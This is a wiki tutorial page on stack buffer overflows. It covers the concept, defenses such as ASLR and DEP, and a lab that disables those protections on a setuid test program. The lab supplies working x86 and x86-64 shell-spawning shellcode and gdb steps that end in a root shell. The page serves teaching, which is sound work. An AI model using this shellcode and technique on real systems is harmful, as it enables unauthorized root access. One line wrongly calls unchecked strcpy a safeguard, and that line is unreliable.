Difference between revisions of "Buffer overflow"
Line 1: | Line 1: | ||
− | '''Buffer overflow''', or '''Buffer Overrun''' is a software error triggered when a program does not adequately control the amount of data that is copied over the [[buffer]], if this amount exceeds the preassigned capacity, remaining | + | '''Buffer overflow''', or '''Buffer Overrun''' is a [[application|software]] error triggered when a program does not adequately control the amount of data that is copied over the [[buffer]], if this amount exceeds the preassigned capacity, remaining [[byte]]s are stored in adjacent memory areas by overwriting its original content. This can be exploited by overwriting a fuction's [[return address]] to cause arbitrary code execution and allow access to a [[vulnerability|vulnerable]] system. |
{{prereq|[[Assembly Basics|assembly]] and [[machine code]].}} | {{prereq|[[Assembly Basics|assembly]] and [[machine code]].}} | ||
Revision as of 12:25, 9 May 2012
Buffer overflow, or Buffer Overrun is a software error triggered when a program does not adequately control the amount of data that is copied over the buffer, if this amount exceeds the preassigned capacity, remaining bytes are stored in adjacent memory areas by overwriting its original content. This can be exploited by overwriting a fuction's return address to cause arbitrary code execution and allow access to a vulnerable system.
Buffer overflow requires a basic understanding of assembly and machine code. |
Contents
Description
A computer receives input, recalls what to do with the input, and then does it. If an attacker on the internet could control the memory of a computer, the computer would remember the wrong thing to do, and execute it because it doesn't know any better. This is what happens during a buffer overflow attack.
The memory of a computer is much like a post office. Each piece of mail goes to a mailbox or a P.O. box, and each P.O. box can only hold one piece of mail at a time. Suppose for a moment that the post office that represents the computer's memory has 500 P.O. boxes. Boxes 1-200 are for data that the user sends into the computer, and boxes 201-500 hold instructions for what to do with that data. If a user sends in 300 pieces of data or mail, there are two scenarios: 1. A secure program would tell the user "I can only hold 200 pieces, I'm not taking any more mail". 2. An insecure program would simply take all the data into boxes 1-300.
In the insecure scenario, when the computer remembers what to do, it lands on P.O. box 201. If the user was an attacker, malicious instructions at P.O. box 201 would be executed! This is why the buffer overflow is such a dangerous vulnerability.In all actuality, there is a return address that the computer uses to remember where its instructions are. So if an attacker filled up P.O. boxes 1-201, and 201 contained the return address, and the attacker changed the return address to P.O. box 1, the computer would execute the data instead of just keeping it in memory. This means that the attacker has to know enough about the system to know what address the malicious instructions are going to, because otherwise the attacker will not know the correct return address to put into P.O. Box 201. This means that the attacker has to have precise aim, or the attack will be unsuccessful.
Defenses
ASLR
There are multiple defenses that have been incorporated into runtime in an attempt to fight buffer overflows and prevent them from taking place. One of the most recent defense mechanisms is called ASLR, which stands for Address Space Layout Randomization. It makes it so every time the computer reboots and every time a program runs, the address space that it lives in changes. In other words, following the mailbox analogy, the return address will never be in the same mailbox. The point of this is to try to prevent an attacker from performing a buffer overflow exploit because the attacker can never aim properly. Unfortunately, attackers have discovered something called "Magic Numbers", which tricks the error handler for programs and allows an attacker to aim his attack correctly without having to know a return address.
DEP
Another defense mechanism that has been implemented is called DEP, which stands for Data Execution Prevention. This is an attempt to prevent the return address from being changed into something in the same memory space as the data, and also prevent machine code (the code that buffer overflows are crafted in) from being placed into data segments. To combat this defense mechanism, attackers have developed ASCII and polymorphic ASCII machine code. ASCII and Polymorphic ASCII code looks like normal user input instead of machine code.
Containers
An even further defense mechanism is called a container, which is another layer of Data Execution Prevention. The container attempts to identify all possible results of code from data within the buffer (or the data segment) and then prevent the application from calling external functions in shared objects from the inside of the buffer. A version of this has been implemented in Cisco Security Agent, or CSA. Linux's GrSec and PaX kernel patches also implement their own version of contained memory space.Bypassing protections
So with CSA, ASLR, and Operating-System supplied DEP, successfully performing a buffer overflow exploit against a system can be extremely difficult. Any attacker who makes it to the point where CSA catches it is already very advanced. To successfully subvert ASLR, DEP and containers one must use polymorphic ASCII shellcode and return-oriented programming. Return-oriented programming is used to evade the NX bit and XD bits, a type of hardware DEP implemented directly into processors. Machine code that self-modifies as well as looks like standard user input and has all of its own functions built into its own code, in a return-oriented fashion, is required to bypass modern-day host level buffer overflow defense standards. The return address must always be specified in normal hexadecimal format, so it will usually look like some really funny characters, like squares or like strange symbols. The IDS or HIDS Context Buffer will show four squares or symbols on the end in a real buffer overflow exploit attempt on 32-bit systems, and eight squares or symbols on the end on a 64-bit system.
Learning to count in hex and bitwise math will tell you more about the sizes. |
Maximum effectiveness
Sometimes attackers and pen-testers alike use what is called Second Stage Shellcode. Many times firewall rules will prevent any connections outgoing from a server machine and prevent all incoming connections except for connections on the specified server port. Because of this, attackers use what is called Second Stage Shellcode to first find the connection that the exploit originated from, and then send the output of the arbitrary functions back along the first connection. This is done to circumvent firewalls and prevent a firewall from blocking a connection.
Buffer overflows can be used remotely to gain partial or total systems access, or they can be used locally to escalate privileges and permissions segments inside of the operating system in order to gain system or root level access. The real threat that a buffer overflow causes is what is called the "Zero-Day attack", also known as a buffer overflow that the security world has never seen before. Zero-Day or 0day attacks are the most devastating to the security industry, causing worms, viruses, and sometimes even hundreds of thousands of systems to be compromised in a single day.
Causes
Buffer overflows exist because a combination of insecure language compilers, insecure programmers and bad cpu architectures that keep return address from a function call in the stack. A programmer should be able to check input to the data segment with relative ease, however often times coders are either ignorant of the problem, overlook the flaw, or sometimes even a disgruntled employee might code the vulnerability into an application himself for his own personal gain after the application goes to production.
Example
Disabling ASLR
The first step is to disable ASLR. This allows the featured proof of concept to be successful. There are other methods of bypassing ASLR, but will not be covered here.
teknical@teknical-vm:~$ sudo -s [sudo] password for teknical: root@teknical-vm:~# echo 0 > /proc/sys/kernel/randomize_va_space root@teknical-vm:~# exit exit teknical@teknical-vm:~$
Test application
The test application is below. Note that there is a statically allocated buffer of 100 bytes. This is what will be overflowed. The use of strcpy on an unchecked buffer is a common procedure. Its use is recommended to prevent applications from being exploited.
bof.c
#include <stdlib.h> #include <stdio.h> #include <string.h> int main(int argc, char *argv[]){ char buffer[100]; strcpy(buffer, argv[1]); return 0; } |
Compiling
For compilation, use the -g option of gcc to include debugging symbols in the linker, resulting in easier code execution.
teknical@teknical-vm:~$ gcc -g bof.c -o bof
Following compilation, the vulnerability can then be triggered. This example has a buffer of 100 bytes, thus a good test is 104 bytes, which will result in an overflow. Ruby is used to dynamically build a 104 byte string with perl another option.
Potential compile-time protections
teknical@teknical-vm:~$ ./bof `ruby -e 'print "\x90"*104'` *** stack smashing detected ***: ./bof terminated
Teknical says |
---|
Wait...What's this? By default on newer versions of gcc and other modern compilers, code is sanitized and protected at compile time. |
Solution for test application
The test application must be compiled without this sanitation. Removing the stack protection from program is done by the utilization of -fno-stack-protector option with gcc.
teknical@teknical-vm:~$ gcc -g -fno-stack-protector bof.c -o bof
Testing
Setuid binary is used for this example to ensure the retrieval of a root shell. Set up the bof binary for setuid below:
teknical@teknical-vm:~$ sudo chown root:root ./bof teknical@teknical-vm:~$ sudo chmod 4755 ./bof
On x86
Following the compilation of the application, the vulnerability can be triggered once again. As stated earlier, 104 bytes are used and this is increased until the vulnerability is triggered.
teknical@teknical-vm:~$ ./bof `ruby -e 'print "\x90"*104'` teknical@teknical-vm:~$ ./bof `ruby -e 'print "\x90"*108'` teknical@teknical-vm:~$ ./bof `ruby -e 'print "\x90"*112'` Segmentation fault
Note that it took 112 bytes to successfully overwrite the saved ebp of the running application. The system is now prepared for attempts of exploitation. Note, that 116 bytes are required to overwrite the return address on the stack.
On x86-64
This number will vary on x86-64...
xo@kingmaker:~$ ./bof `perl -e 'print "\x90" x 100'` xo@kingmaker:~$ ./bof `perl -e 'print "\x90" x 110'` xo@kingmaker:~$ ./bof `perl -e 'print "\x90" x 120'` Segmentation fault xo@kingmaker:~$ ./bof `perl -e 'print "\x90" x 119'`
On x86-64 it takes 120 bytes to trigger a segfault. Another important difference is that the return address will be placed in the 8 bytes rsp register, not the 4 byte esp register.
Disabling DEP
DEP is another protection scheme which prevents code in the stack from being executed. 'execstack' is used to check the status of and set the binary to have an executable stack.
Xochipilli says |
---|
Gcc's `-z execstack' parameter can be used to set the stack as executable at compile time |
The -q option will query the current status.
teknical@teknical-vm:~$ sudo execstack -q bof - bof
Notice the -, which means that the application will NOT have an executable stack. This will prevent successful exploitation.
The -s option is used to set the binary to allow execution on the stack.
teknical@teknical-vm:~$ sudo execstack -s bof
If queried again, an X will appear in its place, which means that the stack is now executable.
teknical@teknical-vm:~$ sudo execstack -q bof X bof
Debugging
The next step is to start up gdb and begin debugging.
Shellcode analysis
Shellcode is machine code for a flat binary execution during exploitation of a buffer overflow exploit. |
On x86
The following will be used as the argument to the test application:
`ruby -e 'print "\x90"*60, "\xeb\x1f\x5e\x89\x76\x08 \x31\xc0\x88\x46\x07\x89 \x46\x0c\xb0\x0b\x89\xf3 \x8d\x4e\x08\x8d\x56\x0c \xcd\x80\x31\xdb\x89\xd8 \x40\xcd\x80\xe8\xdc\xff \xff\xff/bin/sh", "A"*7, "\x41\x41\x41\x41"'`There are a few things to be noted examining the shellcode above.The shell code used is 45 bytes long. It is a setuid() + /bin/sh shellcode:
\xeb\x1f\x5e\x89\x76\x08 \x31\xc0\x88\x46\x07\x89 \x46\x0c\xb0\x0b\x89\xf3 \x8d\x4e\x08\x8d\x56\x0c \xcd\x80\x31\xdb\x89\xd8 \x40\xcd\x80\xe8\xdc\xff \xff\xff/bin/sh
Following previous knowledge that at least 112 bytes are required to overwrite ebp, and another 4 to overwrite the return address. The shellcode is padded with 60 NOPs. 60 + 45 = 105. It is also known that 7 bytes are required to overwrite ebp and another 4 to overwrite the return address. 0x41/'A' is recommended for this portion because it easier to debug with. Another 7 bytes of 'A', are added and then 4 on the end for the return address. 60 + 45 + 7 + 4 = 116, which is the number of bytes needed to overwrite the return address and successfully exploit the target.
On x86-64
The following shellcode is used to spawn a shell:
"\x48\x31\xd2" // xor %rdx, %rdx "\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68" // mov $0x68732f6e69622f2f, %rbx "\x48\xc1\xeb\x08" // shr $0x8, %rbx "\x53" // push %rbx "\x48\x89\xe7" // mov %rsp, %rdi "\x50" // push %rax "\x57" // push %rdi "\x48\x89\xe6" // mov %rsp, %rsi "\xb0\x3b" // mov $0x3b, %al "\x0f\x05"; // syscall
Or:
\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05
This shellcode is 30 bytes long. 120 bytes + 8 bytes are required for the return address. To start, use a 60 byte nopsled + 30 byte shellcode + 30 bytes of padding + 8 byte return address, totaling 128 bytes.
Finding the return address
- Starting gdb
teknical@teknical-vm:~$ gdb -q ./bof Reading symbols from /home/teknical/bof...done.
- Setting a breakpoint inside of the "main" function
(gdb) break main Breakpoint 1 at 0x80483ed: file bof.c, line 7.
- Starting the application with the command line as discussed above.
On x86
(gdb) r `ruby -e 'print "\x90"*60, "[insert our shellcode here]", "A"*7, "\x41\x41\x41\x41"'` Starting program: /home/teknical/bof `ruby -e 'print "\x90"*60, "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56 \x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh", "A"*7, "\x41\x41\x41\x41"'`
Breakpoint 1, main (argc=2, argv=0xbffff474) at bof.c:7 7 strcpy(buffer, argv[1]);
Teknical says |
---|
Viewing the main function, lets examine the stack. It is known that at least 116 bytes on the stack are required, 200 bytes are used to make sure all the required space is present. Another thing to look for is the address of the shell code on the stack. |
(gdb) x/200x $esp 0xbffff340: 0x00119222 0xbffff3e4 0x080481f4 0xbffff3d8 0xbffff350: 0x0012ca54 0x00000000 0x0012fb48 0x00000001 0xbffff360: 0x00000000 0x00000001 0x0012c8f8 0x00293ff4 0xbffff370: 0x00242d19 0x0016d2a5 0xbffff388 0x001549d5 0xbffff380: 0x00293ff4 0x08049ff4 0xbffff398 0x080482e8 0xbffff390: 0x0011e030 0x08049ff4 0xbffff3c8 0x08048439 0xbffff3a0: 0x00294324 0x00293ff4 0x08048420 0xbffff3c8 0xbffff3b0: 0x0016d4a5 0x0011e030 0x0804842b 0x00293ff4 0xbffff3c0: 0x08048420 0x00000000 0xbffff448 0x00154bd6 0xbffff3d0: 0x00000002 0xbffff474 0xbffff480 0x0012f858 0xbffff3e0: 0xbffff430 0xffffffff 0x0012bff4 0x08048245 0xbffff3f0: 0x00000001 0xbffff430 0x0011d626 0x0012cab0 0xbffff400: 0x0012fb48 0x00293ff4 0x00000000 0x00000000 0xbffff410: 0xbffff448 0xee66f487 0x3b1663f8 0x00000000 0xbffff420: 0x00000000 0x00000000 0x00000002 0x08048330 0xbffff430: 0x00000000 0x00123230 0x00154afb 0x0012bff4 0xbffff440: 0x00000002 0x08048330 0x00000000 0x08048351 0xbffff450: 0x080483e4 0x00000002 0xbffff474 0x08048420 0xbffff460: 0x08048410 0x0011e030 0xbffff46c 0x0012c8f8 0xbffff470: 0x00000002 0xbffff5e4 0xbffff5f7 0x00000000 0xbffff480: 0xbffff66c 0xbffff690 0xbffff6a3 0xbffff6b3 0xbffff490: 0xbffff6be 0xbffff70f 0xbffff721 0xbffff74b 0xbffff4a0: 0xbffff76b 0xbffff779 0xbffffc1a 0xbffffc40 0xbffff4b0: 0xbffffc52 0xbffffcae 0xbffffce0 0xbffffceb 0xbffff4c0: 0xbffffd17 0xbffffd64 0xbffffd7a 0xbffffd89 0xbffff4d0: 0xbffffd9c 0xbffffdb3 0xbffffdca 0xbffffdda 0xbffff4e0: 0xbffffdee 0xbffffe23 0xbffffe2c 0xbffffe3d 0xbffff4f0: 0xbffffe4f 0xbffffe63 0xbffffe6b 0xbffffe97 0xbffff500: 0xbffffea8 0xbfffff0a 0xbfffff47 0xbfffff67 0xbffff510: 0xbfffff74 0xbfffff96 0xbfffffaf 0x00000000 0xbffff520: 0x00000020 0x0012d420 0x00000021 0x0012d000 0xbffff530: 0x00000010 0x078bf3ff 0x00000006 0x00001000 0xbffff540: 0x00000011 0x00000064 0x00000003 0x08048034 0xbffff550: 0x00000004 0x00000020 0x00000005 0x00000008 0xbffff560: 0x00000007 0x00110000 0x00000008 0x00000000 0xbffff570: 0x00000009 0x08048330 0x0000000b 0x000003e8 0xbffff580: 0x0000000c 0x000003e8 0x0000000d 0x000003e8 0xbffff590: 0x0000000e 0x000003e8 0x00000017 0x00000001 0xbffff5a0: 0x00000019 0xbffff5cb 0x0000001f 0xbfffffe9 0xbffff5b0: 0x0000000f 0xbffff5db 0x00000000 0x00000000 0xbffff5c0: 0x00000000 0x00000000 0x85000000 0xaaec0f53 0xbffff5d0: 0xb8fc08c0 0xd3d76e6a 0x693bf638 0x00363836 0xbffff5e0: 0x00000000 0x6d6f682f 0x65742f65 0x63696e6b 0xbffff5f0: 0x622f6c61 0x9000666f 0x90909090 0x90909090 0xbffff600: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff610: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff620: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff630: 0xeb909090 0x76895e1f 0x88c03108 0x46890746 0xbffff640: 0x890bb00c 0x084e8df3 0xcd0c568d 0x89db3180 0xbffff650: 0x80cd40d8 0xffffdce8 0x69622fff 0x68732f6e
The next step is to find the shellcode on the stack. The easiest thing to do here is to look for the NOPs. The address of the NOPs is required so this can be used as the return address on the stack. This will cause execution to resume with the shell code once the function returns.
Note the NOPS above starting at 0xbffff5f8. 0xbffff610 will be used since it is a cleaner address. This can be arranged in little endian format: "\x10\xf6\xff\xbf"
On x86-64
(gdb) r `perl -e 'print "\x90" x 60, "\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68 \x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05", "A" x 30, "\x41\x41 \x41\x41\x41\x41\x41\x41"'` Starting program: /home/xo/filez/bof/bof `perl -e 'print "\x90" x 60, "\x48\x31\xd2\x48\xbb \x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b \x0f\x05", "A" x 30, "\x41\x41\x41\x41\x41\x41\x41\x41"'` (gdb) x/400x $rsp
Xochipilli says |
---|
I truncated this cause it was huge |
... 0x7fffffffe510: 0x00000064 0x00000000 0x00000003 0x00000000 0x7fffffffe520: 0x00400040 0x00000000 0x00000004 0x00000000 0x7fffffffe530: 0x00000038 0x00000000 0x00000005 0x00000000 0x7fffffffe540: 0x00000008 0x00000000 0x00000007 0x00000000 0x7fffffffe550: 0xf7ddd000 0x00007fff 0x00000008 0x00000000 0x7fffffffe560: 0x00000000 0x00000000 0x00000009 0x00000000 0x7fffffffe570: 0x00400400 0x00000000 0x0000000b 0x00000000 0x7fffffffe580: 0x000003e8 0x00000000 0x0000000c 0x00000000 0x7fffffffe590: 0x000003e8 0x00000000 0x0000000d 0x00000000 0x7fffffffe5a0: 0x000003e8 0x00000000 0x0000000e 0x00000000 0x7fffffffe5b0: 0x000003e8 0x00000000 0x00000017 0x00000000 0x7fffffffe5c0: 0x00000000 0x00000000 0x00000019 0x00000000 0x7fffffffe5d0: 0xffffe609 0x00007fff 0x0000001f 0x00000000 0x7fffffffe5e0: 0xffffefe1 0x00007fff 0x0000000f 0x00000000 0x7fffffffe5f0: 0xffffe619 0x00007fff 0x00000000 0x00000000 0x7fffffffe600: 0x00000000 0x00000000 0xcc45c200 0xf80e704b 0x7fffffffe610: 0xd5660936 0xff5959b5 0x36387878 0x0034365f 0x7fffffffe620: 0x00000000 0x00000000 0x6d6f682f 0x6f782f65 0x7fffffffe630: 0x6c69662f 0x622f7a65 0x622f666f 0x9000666f 0x7fffffffe640: 0x90909090 0x90909090 0x90909090 0x90909090 0x7fffffffe650: 0x90909090 0x90909090 0x90909090 0x90909090 0x7fffffffe660: 0x90909090 0x90909090 0x90909090 0x90909090 0x7fffffffe670: 0x90909090 0x90909090 0x48909090 0xbb48d231 ...
Note the nopsled begins at 0x7fffffffe640, thus placed into rsp. Converted to little endian and formatted appropriately, this is \x40\xe6\xff\xff\xff\x7f\x00\x00.
Exploitation
Following the clearance of the breakpoint, restart the application with the same command line argument, but replace the "\x41\x41\x41x\x41" at the end of the argument with the return address of "\x10\xf6\xff\xbf"
(gdb) clear main Deleted breakpoint 1
On x86
(gdb) r `ruby -e 'print "\x90"*60, "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46 \x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89 \xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh", "A"*7, "\x10\xf6\xff\xbf"'` The program being debugged has been started already. Start it from the beginning? (y or n) y
Starting program: /home/teknical/bof `ruby -e 'print "\x90"*60,"\xeb\x1f\x5e \x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d \x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh", "A"*7, "\x10\xf6\xff\xbf"'` process 2262 is executing new program: /bin/sh # whoami root #
On x86-64
(gdb) r `perl -e 'print "\x90" x 60, "\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e \x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f \x05", "A" x 30, "\x40\xe6\xff\xff\xff\x7f\x00\x00"'` Starting program: /home/xo/filez/bof/bof `perl -e 'print "\x90" x 60, "\x48\x31 \xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50 \x57\x48\x89\xe6\xb0\x3b\x0f\x05", "A" x 30, "\x40\xe6\xff\xff\xff\x7f\x00\x00"'` process 27319 is executing new program: /bin/dash $ whoami xo $
Xochipilli says |
---|
The x86-64 shellcode used in this example does not call setuid() so it will execute at the privileges of the exploited application |
YAY! Successful exploitation has occured.